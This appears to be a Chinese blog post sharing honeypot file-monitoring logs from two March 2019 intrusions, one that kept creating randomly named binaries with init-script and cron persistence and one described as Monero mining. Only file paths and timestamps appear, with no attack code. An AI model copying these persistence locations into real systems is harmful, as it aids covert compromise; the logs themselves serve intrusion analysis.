蜜罐捕捉的日志脚本整理 – 作者:陌度

捕捉到的东西

https://github.com/yingshang/Legacy-of-intrusion.git

2019-3-19号

黑客上传了几个脚本,里面有一个不断生成和并不断执行,直接你的硬盘和内存爆破,我的蜜罐直接被卡死

Line 13703: INFO:root:CREATE event : /dev/shm/BIdsqkKc  2019-03-19 11:33:33.934697
	Line 13862: INFO:root:CREATE event : /dev/shm/BIdsqkKc  2019-03-19 11:33:41.071763
	Line 14425: INFO:root:CREATE event : /dev/shm/B00M  2019-03-19 11:34:07.028623
	Line 14569: INFO:root:CREATE event : /dev/shm/TfkajmkIH  2019-03-19 11:34:13.624843
	Line 14709: INFO:root:CREATE event : /dev/shm/TfkajmkIH  2019-03-19 11:34:20.874330
	Line 15226: INFO:root:CREATE event : /dev/shm/B00M  2019-03-19 11:34:44.845148
	Line 15710: INFO:root:CREATE event : /root/mi3307  2019-03-19 11:47:38.111477
	Line 15918: INFO:root:CREATE event : /lib/libudev.so  2019-03-19 11:47:38.640116
	Line 16228: INFO:root:CREATE event : /usr/bin/mljdjbqxuq  2019-03-19 11:47:39.317262
	Line 16561: INFO:root:CREATE event : /etc/init.d/mljdjbqxuq  2019-03-19 11:47:39.754944
	Line 16575: INFO:root:CREATE event : /etc/cron.hourly/gcc.sh  2019-03-19 11:47:39.757342
	Line 16588: INFO:root:CREATE event : /etc/rc1.d/S90mljdjbqxuq  2019-03-19 11:47:39.760102
	Line 16591: INFO:root:CREATE event : /etc/rc2.d/S90mljdjbqxuq  2019-03-19 11:47:39.760918
	Line 16593: INFO:root:CREATE event : /etc/rc3.d/S90mljdjbqxuq  2019-03-19 11:47:39.761409
	Line 16595: INFO:root:CREATE event : /etc/rc4.d/S90mljdjbqxuq  2019-03-19 11:47:39.761975
	Line 16607: INFO:root:CREATE event : /etc/rc5.d/S90mljdjbqxuq  2019-03-19 11:47:39.763688
	Line 16703: INFO:root:CREATE event : /etc/sedTeXeUr  2019-03-19 11:47:39.786380
	Line 16713: INFO:root:CREATE event : /usr/bin/itwgznmnoq  2019-03-19 11:47:39.790291
	Line 17029: INFO:root:CREATE event : /run/gcc.pid  2019-03-19 11:47:39.880049
	Line 17699: INFO:root:CREATE event : /usr/bin/hdgxvqdrsm  2019-03-19 11:47:43.803555
	Line 18623: INFO:root:CREATE event : /usr/bin/tfyczjenzc  2019-03-19 11:47:48.795079
	Line 19734: INFO:root:CREATE event : /usr/bin/tcbajoqxih  2019-03-19 11:47:53.814405
	Line 20911: INFO:root:CREATE event : /usr/bin/qwqtwyndll  2019-03-19 11:47:58.862042
	Line 21996: INFO:root:CREATE event : /usr/bin/wlrxmjobio  2019-03-19 11:48:03.851830
	Line 23074: INFO:root:CREATE event : /usr/bin/rghrsafgrk  2019-03-19 11:48:08.877788
	Line 24066: INFO:root:CREATE event : /usr/bin/zgozhbbcyy  2019-03-19 11:48:13.910422
	Line 25160: INFO:root:CREATE event : /usr/bin/wvrtivxvlm  2019-03-19 11:48:18.932093
	Line 26254: INFO:root:CREATE event : /usr/bin/tepjqlylch  2019-03-19 11:48:23.973665
	Line 27355: INFO:root:CREATE event : /usr/bin/dpcuygdzwd  2019-03-19 11:48:29.063822
	Line 28441: INFO:root:CREATE event : /usr/bin/efuaffgsgs  2019-03-19 11:48:34.089048
	Line 29538: INFO:root:CREATE event : /usr/bin/gsfulgfjzd  2019-03-19 11:48:39.112690
	Line 30656: INFO:root:CREATE event : /usr/bin/tjminyopuf  2019-03-19 11:48:44.134765
	Line 31741: INFO:root:CREATE event : /usr/bin/qjyogmvqxv  2019-03-19 11:48:49.154488
	Line 32854: INFO:root:CREATE event : /usr/bin/avjvmbemyu  2019-03-19 11:48:54.203118
	Line 33878: INFO:root:CREATE event : /usr/bin/ibuidgnelw  2019-03-19 11:48:59.229367
	Line 34992: INFO:root:CREATE event : /usr/bin/iksgdzxmrr  2019-03-19 11:49:04.248427
	Line 36078: INFO:root:CREATE event : /usr/bin/dqhhhcfdrs  2019-03-19 11:49:09.282517
	Line 37195: INFO:root:CREATE event : /usr/bin/liryxanysl  2019-03-19 11:49:14.320403
	Line 38311: INFO:root:CREATE event : /usr/bin/ikvrwrtbar  2019-03-19 11:49:19.386290
	Line 39421: INFO:root:CREATE event : /usr/bin/wgbhpgkhva  2019-03-19 11:49:24.415379
	Line 40532: INFO:root:CREATE event : /usr/bin/ilwcdmjaxx  2019-03-19 11:49:29.484670
	Line 41613: INFO:root:CREATE event : /usr/bin/jzahqxwfix  2019-03-19 11:49:34.510543
	Line 42714: INFO:root:CREATE event : /usr/bin/hkjidwudsj  2019-03-19 11:49:39.584346
	Line 43802: INFO:root:CREATE event : /usr/bin/ettnlpziav  2019-03-19 11:49:44.645891
	Line 44898: INFO:root:CREATE event : /usr/bin/xzjrzdjjso  2019-03-19 11:49:49.646176
	Line 45996: INFO:root:CREATE event : /usr/bin/mrhxtxvoge  2019-03-19 11:49:54.707326
	Line 47069: INFO:root:CREATE event : /usr/bin/djohznghsk  2019-03-19 11:49:59.798660
	Line 48193: INFO:root:CREATE event : /usr/bin/caqliaehly  2019-03-19 11:50:04.833356
	Line 49296: INFO:root:CREATE event : /usr/bin/vrkxxcxzuj  2019-03-19 11:50:09.852183
	Line 50376: INFO:root:CREATE event : /usr/bin/joqhtqzygl  2019-03-19 11:50:14.892930
	Line 51465: INFO:root:CREATE event : /usr/bin/mvrmlzpfkr  2019-03-19 11:50:19.921282
	Line 52584: INFO:root:CREATE event : /usr/bin/xecszwdprk  2019-03-19 11:50:24.963665
	Line 53680: INFO:root:CREATE event : /usr/bin/eaenxzzblz  2019-03-19 11:50:29.990015
	Line 54500: INFO:root:CREATE event : /usr/bin/uuxflgtgay  2019-03-19 11:50:35.016746
	Line 55613: INFO:root:CREATE event : /usr/bin/sowaxanykz  2019-03-19 11:50:40.045852
	Line 56700: INFO:root:CREATE event : /usr/bin/rngverfygu  2019-03-19 11:50:45.069087
	Line 57797: INFO:root:CREATE event : /usr/bin/kelvnqcwgr  2019-03-19 11:50:50.112345
	Line 58917: INFO:root:CREATE event : /usr/bin/pjkfnqrxjl  2019-03-19 11:50:55.136699
	Line 60016: INFO:root:CREATE event : /usr/bin/wqzbdjdqfn  2019-03-19 11:51:00.188586
	Line 61128: INFO:root:CREATE event : /usr/bin/hpkdvojjxw  2019-03-19 11:51:05.210515
	Line 62249: INFO:root:CREATE event : /usr/bin/rhtoxzhlms  2019-03-19 11:51:10.234045
	Line 63354: INFO:root:CREATE event : /usr/bin/oqvwdfxeaw  2019-03-19 11:51:15.274103
	Line 64491: INFO:root:CREATE event : /usr/bin/cclojjaive  2019-03-19 11:51:20.317813
	Line 65593: INFO:root:CREATE event : /usr/bin/vqqpaelesh  2019-03-19 11:51:25.350728
	Line 66687: INFO:root:CREATE event : /usr/bin/rigapuhpdn  2019-03-19 11:51:30.383180
	Line 67822: INFO:root:CREATE event : /usr/bin/voqjewxuqu  2019-03-19 11:51:35.447531
	Line 68886: INFO:root:CREATE event : /usr/bin/ztxkldmywg  2019-03-19 11:51:40.447447
	Line 69968: INFO:root:CREATE event : /usr/bin/zgkwshpmss  2019-03-19 11:51:45.582693
	Line 71079: INFO:root:CREATE event : /usr/bin/upcultngri  2019-03-19 11:51:50.608717
	Line 72158: INFO:root:CREATE event : /usr/bin/rojksksovb  2019-03-19 11:51:55.640087
	Line 73243: INFO:root:CREATE event : /usr/bin/lalzylwttz  2019-03-19 11:52:00.664435
	Line 74343: INFO:root:CREATE event : /usr/bin/pvoljuuvng  2019-03-19 11:52:05.703119
	Line 75451: INFO:root:CREATE event : /usr/bin/juwtljomtq  2019-03-19 11:52:10.771522
	Line 76571: INFO:root:CREATE event : /usr/bin/ejqcwhvylv  2019-03-19 11:52:15.904960
	Line 77682: INFO:root:CREATE event : /usr/bin/dwarotcwei  2019-03-19 11:52:20.946080
	Line 78784: INFO:root:CREATE event : /usr/bin/nwlhaspckz  2019-03-19 11:52:25.985090
	Line 79894: INFO:root:CREATE event : /usr/bin/zomshobpvz  2019-03-19 11:52:31.100967
	Line 80984: INFO:root:CREATE event : /usr/bin/cdjucqrwsr  2019-03-19 11:52:36.243796
	Line 82076: INFO:root:CREATE event : /usr/bin/pnjlomfubx  2019-03-19 11:52:41.262007
	Line 83157: INFO:root:CREATE event : /usr/bin/kmcmzgokzm  2019-03-19 11:52:46.301496
	Line 84255: INFO:root:CREATE event : /usr/bin/zghzlgmsyj  2019-03-19 11:52:51.323833
	Line 85379: INFO:root:CREATE event : /usr/bin/tjsnhqgoog  2019-03-19 11:52:56.381780
	Line 86438: INFO:root:CREATE event : /usr/bin/lbodntcnpi  2019-03-19 11:53:01.384079
	Line 87523: INFO:root:CREATE event : /usr/bin/sclkrpxyrl  2019-03-19 11:53:06.397228
	Line 88718: INFO:root:CREATE event : /usr/bin/qimqfzkzxz  2019-03-19 11:53:11.483370
	Line 89801: INFO:root:CREATE event : /usr/bin/yhpjlrzndo  2019-03-19 11:53:16.493737
	Line 90892: INFO:root:CREATE event : /usr/bin/ztmfopzspc  2019-03-19 11:53:21.625367
	Line 91991: INFO:root:CREATE event : /usr/bin/jaxashciyq  2019-03-19 11:53:26.649283
	Line 93080: INFO:root:CREATE event : /usr/bin/jbwynyusjm  2019-03-19 11:53:31.667976
	Line 94141: INFO:root:CREATE event : /usr/bin/hwsqtsempg  2019-03-19 11:53:36.780939
	Line 95238: INFO:root:CREATE event : /usr/bin/welovbhjft  2019-03-19 11:53:41.863879
	Line 96150: INFO:root:CREATE event : /usr/bin/wlzubzaieu  2019-03-19 11:53:46.885064
	Line 97258: INFO:root:CREATE event : /usr/bin/tlnktrgouv  2019-03-19 11:53:51.934835
	Line 98322: INFO:root:CREATE event : /usr/bin/niozmehmuy  2019-03-19 11:53:56.993401
	Line 99320: INFO:root:CREATE event : /usr/bin/yyxuxablqc  2019-03-19 11:54:02.223188
	Line 100385: INFO:root:CREATE event : /usr/bin/xioswewick  2019-03-19 11:54:07.243593
	Line 101468: INFO:root:CREATE event : /usr/bin/kdhrthmfyv  2019-03-19 11:54:12.264061
	Line 102492: INFO:root:CREATE event : /usr/bin/mgnuwfmtbn  2019-03-19 11:54:17.279359
	Line 103486: INFO:root:CREATE event : /usr/bin/yldlboumsy  2019-03-19 11:54:22.297750
	Line 104678: INFO:root:CREATE event : /usr/bin/ywetrirkxi  2019-03-19 11:54:27.316287
	Line 105804: INFO:root:CREATE event : /usr/bin/jepqzfnftn  2019-03-19 11:54:32.333110
	Line 106890: INFO:root:CREATE event : /usr/bin/imqafwkjdw  2019-03-19 11:54:37.355253
	Line 108015: INFO:root:CREATE event : /usr/bin/qvygfqisbs  2019-03-19 11:54:42.370762
	Line 109151: INFO:root:CREATE event : /usr/bin/upvljogxuc  2019-03-19 11:54:47.392550
	Line 110244: INFO:root:CREATE event : /usr/bin/ydxqyonnnp  2019-03-19 11:54:52.409708
	Line 111367: INFO:root:CREATE event : /usr/bin/hgziqmhpst  2019-03-19 11:54:57.433024
	Line 112485: INFO:root:CREATE event : /usr/bin/qbdblchcdr  2019-03-19 11:55:02.453102
	Line 113608: INFO:root:CREATE event : /usr/bin/sywscbdtxw  2019-03-19 11:55:07.471159
	Line 114658: INFO:root:CREATE event : /usr/bin/hnykoobvyi  2019-03-19 11:55:12.489864
	Line 115778: INFO:root:CREATE event : /usr/bin/ntbewdfawr  2019-03-19 11:55:17.507733
	Line 116901: INFO:root:CREATE event : /usr/bin/cjiptqfzyn  2019-03-19 11:55:22.523887
	Line 118005: INFO:root:CREATE event : /usr/bin/kmkxseewmj  2019-03-19 11:55:27.544122
	Line 119119: INFO:root:CREATE event : /usr/bin/udvkhawyzw  2019-03-19 11:55:32.564481
	Line 120225: INFO:root:CREATE event : /usr/bin/iallspknhm  2019-03-19 11:55:37.584333
	Line 121445: INFO:root:CREATE event : /usr/bin/jinxrssxzc  2019-03-19 11:55:42.602588
	Line 122570: INFO:root:CREATE event : /usr/bin/refospazwn  2019-03-19 11:55:47.624460
	Line 123661: INFO:root:CREATE event : /usr/bin/ocnwsicxys  2019-03-19 11:55:52.640890
	Line 124893: INFO:root:CREATE event : /usr/bin/nhmsuqhjdp  2019-03-19 11:55:57.659310
	Line 125984: INFO:root:CREATE event : /usr/bin/gzaywdyqhr  2019-03-19 11:56:02.677282
	Line 127093: INFO:root:CREATE event : /usr/bin/izgnqjwzbe  2019-03-19 11:56:07.696340
	Line 128215: INFO:root:CREATE event : /usr/bin/yipnblnksp  2019-03-19 11:56:12.716089
	Line 129335: INFO:root:CREATE event : /usr/bin/fowgrzbpoo  2019-03-19 11:56:17.737022
	Line 130466: INFO:root:CREATE event : /usr/bin/hbwrucsaye  2019-03-19 11:56:22.755358
	Line 131555: INFO:root:CREATE event : /usr/bin/echktugnfh  2019-03-19 11:56:27.772768
	Line 132601: INFO:root:CREATE event : /usr/bin/rqhxnpgivg  2019-03-19 11:56:32.791967
	Line 133712: INFO:root:CREATE event : /usr/bin/ukxikaonip  2019-03-19 11:56:37.811970
	Line 134820: INFO:root:CREATE event : /usr/bin/axjjvapppz  2019-03-19 11:56:42.832591
	Line 135932: INFO:root:CREATE event : /usr/bin/mjcjwqedqv  2019-03-19 11:56:47.853416
	Line 137041: INFO:root:CREATE event : /usr/bin/fephwodrjv  2019-03-19 11:56:52.874117
	Line 138012: INFO:root:CREATE event : /usr/bin/tzlzjmxlfi  2019-03-19 11:56:57.893816
	Line 139117: INFO:root:CREATE event : /usr/bin/bzqptzkwfv  2019-03-19 11:57:02.910851
	Line 140205: INFO:root:CREATE event : /usr/bin/kplhzzybnr  2019-03-19 11:57:07.932082
	Line 141302: INFO:root:CREATE event : /usr/bin/dmuworqhap  2019-03-19 11:57:12.948061
	Line 142406: INFO:root:CREATE event : /usr/bin/wmazvhgoyq  2019-03-19 11:57:17.971944
	Line 143463: INFO:root:CREATE event : /usr/bin/zlvobfyvuo  2019-03-19 11:57:22.993139
	Line 144571: INFO:root:CREATE event : /usr/bin/xteuvtqgou  2019-03-19 11:57:28.009971
	Line 145678: INFO:root:CREATE event : /usr/bin/kigyaggzht  2019-03-19 11:57:33.032718
	Line 146787: INFO:root:CREATE event : /usr/bin/raeykerfvg  2019-03-19 11:57:38.051081
	Line 147888: INFO:root:CREATE event : /usr/bin/darjqjewfh  2019-03-19 11:57:43.074353
	Line 148972: INFO:root:CREATE event : /usr/bin/wxbnxxydvo  2019-03-19 11:57:48.096870
	Line 150079: INFO:root:CREATE event : /usr/bin/obcqcdsxuc  2019-03-19 11:57:53.137767
	Line 151192: INFO:root:CREATE event : /usr/bin/jveuwxenps  2019-03-19 11:57:58.132597
	Line 152050: INFO:root:CREATE event : /usr/bin/ettyutiier  2019-03-19 11:58:03.151999
	Line 153163: INFO:root:CREATE event : /usr/bin/tjjjjwicxu  2019-03-19 11:58:08.169554
	Line 154358: INFO:root:CREATE event : /usr/bin/hsehzxokyd  2019-03-19 11:58:13.187791
	Line 155218: INFO:root:CREATE event : /usr/bin/foctkvooxa  2019-03-19 11:58:18.237427
	Line 156336: INFO:root:CREATE event : /usr/bin/hmlwlqheph  2019-03-19 11:58:25.144106
	Line 157509: INFO:root:CREATE event : /usr/bin/wdxsweahga  2019-03-19 11:58:30.159639
	Line 158607: INFO:root:CREATE event : /usr/bin/zbzewvinhq  2019-03-19 11:58:35.197122
	Line 159541: INFO:root:CREATE event : /usr/bin/sagkohkajx  2019-03-19 11:58:40.247561
	Line 160672: INFO:root:CREATE event : /usr/bin/xjcsynmmvq  2019-03-19 11:58:45.239934
	Line 161875: INFO:root:CREATE event : /usr/bin/rcejcgrblq  2019-03-19 11:58:50.279780
	Line 162919: INFO:root:CREATE event : /usr/bin/rfdtscspik  2019-03-19 11:58:55.280718
	Line 163971: INFO:root:CREATE event : /usr/bin/aatumvjxpc  2019-03-19 11:59:00.299457
	Line 164953: INFO:root:CREATE event : /usr/bin/zxuqmzloir  2019-03-19 11:59:05.324995
	Line 166056: INFO:root:CREATE event : /usr/bin/nqgikjvtqg  2019-03-19 11:59:10.367343
	Line 167158: INFO:root:CREATE event : /usr/bin/fjptqhsgim  2019-03-19 11:59:15.357824
	Line 168290: INFO:root:CREATE event : /usr/bin/cqplewqfvz  2019-03-19 11:59:20.378778
	Line 169371: INFO:root:CREATE event : /usr/bin/wcrbyehplz  2019-03-19 11:59:25.395906
	Line 170487: INFO:root:CREATE event : /usr/bin/ajysxqmxuz  2019-03-19 11:59:30.415865
	Line 171510: INFO:root:CREATE event : /usr/bin/jwkeummbzr  2019-03-19 11:59:35.431802
	Line 172606: INFO:root:CREATE event : /usr/bin/nutapebskg  2019-03-19 11:59:40.455338
	Line 173785: INFO:root:CREATE event : /usr/bin/ysgktqqvty  2019-03-19 11:59:45.472435
	Line 174915: INFO:root:CREATE event : /usr/bin/kxerendyzp  2019-03-19 11:59:50.491086

2019-3-21号

门罗币挖矿

root@localhost:/record# cat monitor.log | grep CREATE
INFO:root:CREATE event : /dev/pts/0  2019-03-20 02:08:54.558236
INFO:root:CREATE event : /usr/operation  2019-03-20 02:09:11.379264
INFO:root:CREATE event : /dev/pts/0  2019-03-20 04:09:38.896324
INFO:root:CREATE event : /root/.bash_history  2019-03-20 04:10:02.758810
INFO:root:CREATE event : /bin/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:13:13.196724
INFO:root:CREATE event : /bin/dhpcd  2019-03-20 15:13:21.085534
INFO:root:CREATE event : /etc/nshadow  2019-03-20 15:13:53.019796
INFO:root:CREATE event : /root/.ssh  2019-03-20 15:14:13.246905
INFO:root:CREATE event : /dev/shm/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:18.103935
INFO:root:CREATE event : /tmp/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:28.352342
INFO:root:CREATE event : /tmp/knrm  2019-03-20 15:14:33.395370
INFO:root:CREATE event : /tmp/r  2019-03-20 15:14:37.392344
INFO:root:CREATE event : /tmp/tmp.efsTWF68ua  2019-03-20 15:14:40.254357
INFO:root:CREATE event : /etc/sedRnzDvp  2019-03-20 15:14:40.262898
INFO:root:CREATE event : /var/spool/cron/crontabs/tmp.wkldnB  2019-03-20 15:14:40.526935
INFO:root:CREATE event : /tmp/tmp.O5mRAvm7ST  2019-03-20 15:14:48.853449
INFO:root:CREATE event : /etc/sed1evIks  2019-03-20 15:14:48.857253
INFO:root:CREATE event : /var/spool/cron/crontabs/tmp.5gdVYA  2019-03-20 15:14:49.207956
INFO:root:CREATE event : /bin/dhpcd  2019-03-20 15:14:53.271247
root@localhost:/record# cat monitor.log | grep MODI
INFO:root:MODIFY event : /run/utmp  2019-03-20 02:09:11.359695
INFO:root:MODIFY event : /dev/null  2019-03-20 02:09:11.395338
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 02:09:11.406661
INFO:root:MODIFY event : /run/utmp  2019-03-20 02:09:11.495534
INFO:root:MODIFY event : /sys/fs/cgroup/hugetlb/cgroup.procs  2019-03-20 04:09:38.821148
INFO:root:MODIFY event : /sys/fs/cgroup/hugetlb/cgroup.procs  2019-03-20 04:09:38.822800
INFO:root:MODIFY event : /sys/fs/cgroup/systemd/cgroup.procs  2019-03-20 04:09:38.844848
INFO:root:MODIFY event : /sys/fs/cgroup/systemd/cgroup.procs  2019-03-20 04:09:38.854813
INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.855580
INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.856195
INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.856689
INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.859445
INFO:root:MODIFY event : /sys/fs/cgroup/pids/cgroup.procs  2019-03-20 04:09:38.860014
INFO:root:MODIFY event : /sys/fs/cgroup/pids/cgroup.procs  2019-03-20 04:09:38.860579
INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.861078
INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.861639
INFO:root:MODIFY event : /sys/fs/cgroup/freezer/cgroup.procs  2019-03-20 04:09:38.862137
INFO:root:MODIFY event : /sys/fs/cgroup/freezer/cgroup.procs  2019-03-20 04:09:38.867408
INFO:root:MODIFY event : /sys/fs/cgroup/cpuset/cgroup.procs  2019-03-20 04:09:38.868089
INFO:root:MODIFY event : /sys/fs/cgroup/cpuset/cgroup.procs  2019-03-20 04:09:38.868791
INFO:root:MODIFY event : /sys/fs/cgroup/devices/cgroup.procs  2019-03-20 04:09:38.869305
INFO:root:MODIFY event : /sys/fs/cgroup/devices/cgroup.procs  2019-03-20 04:09:38.869973
INFO:root:MODIFY event : /sys/fs/cgroup/memory/cgroup.procs  2019-03-20 04:09:38.870519
INFO:root:MODIFY event : /sys/fs/cgroup/memory/cgroup.procs  2019-03-20 04:09:38.875420
INFO:root:MODIFY event : /sys/fs/cgroup/perf_event/cgroup.procs  2019-03-20 04:09:38.875940
INFO:root:MODIFY event : /sys/fs/cgroup/perf_event/cgroup.procs  2019-03-20 04:09:38.876589
INFO:root:MODIFY event : /sys/fs/cgroup/blkio/cgroup.procs  2019-03-20 04:09:38.877095
INFO:root:MODIFY event : /sys/fs/cgroup/blkio/cgroup.procs  2019-03-20 04:09:38.877714
INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.878251
INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.878898
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:39.164499
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.176459
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.313840
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.414496
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.541559
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.018949
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.167878
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.480871
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.132803
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.371361
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.558634
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.773391
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.287925
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.377093
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.590337
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.840286
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.927635
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:44.055641
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.080589
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.256384
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.456842
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:46.861468
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.374563
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.538828
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.651745
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.721959
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:48.868994
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.019794
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.081561
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.094732
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.515933
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.640233
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.688437
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.689514
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.395020
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.596157
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.823423
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.049726
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.210870
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.412377
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.512597
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.662840
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.686100
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.686901
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.687545
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.027683
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.152111
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.252011
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.390181
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.566355
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.640919
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.917892
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:00.105004
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.348837
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.673340
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.861180
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:02.062987
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:02.740363
INFO:root:MODIFY event : /root/.bash_history  2019-03-20 04:10:02.763356
INFO:root:MODIFY event : /bin/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:13:13.695989
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:22.908247
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:24.316824
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:25.196549
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:26.028442
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:26.906511
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:27.775044
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:28.648578
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:29.552310
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:30.428356
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:31.283118
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:32.187718
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:33.258305
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:34.241886
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:35.284409
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:36.296268
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:37.413299
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:38.281973
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:39.200778
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:40.981730
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:42.768890
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:42.769996
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:43.825358
INFO:root:MODIFY event : /etc/nshadow  2019-03-20 15:13:53.022030
INFO:root:MODIFY event : /dev/shm/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:18.455523
INFO:root:MODIFY event : /tmp/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:28.775480
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.118183
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.253943
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.462640
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.676316
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.835138
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:35.051863
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:35.177190
INFO:root:MODIFY event : /tmp/r  2019-03-20 15:14:37.928084
INFO:root:MODIFY event : /etc/sedRnzDvp  2019-03-20 15:14:40.270026
INFO:root:MODIFY event : /var/spool/cron/crontabs/tmp.wkldnB  2019-03-20 15:14:40.528250
INFO:root:MODIFY event : /dev/null  2019-03-20 15:14:43.419044
INFO:root:MODIFY event : /etc/sed1evIks  2019-03-20 15:14:48.857973
INFO:root:MODIFY event : /var/spool/cron/crontabs/tmp.5gdVYA  2019-03-20 15:14:49.217717
INFO:root:MODIFY event : /dev/null  2019-03-20 15:14:50.245119
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:53.816718
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:53.972817
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.138558
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.303399
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.457962
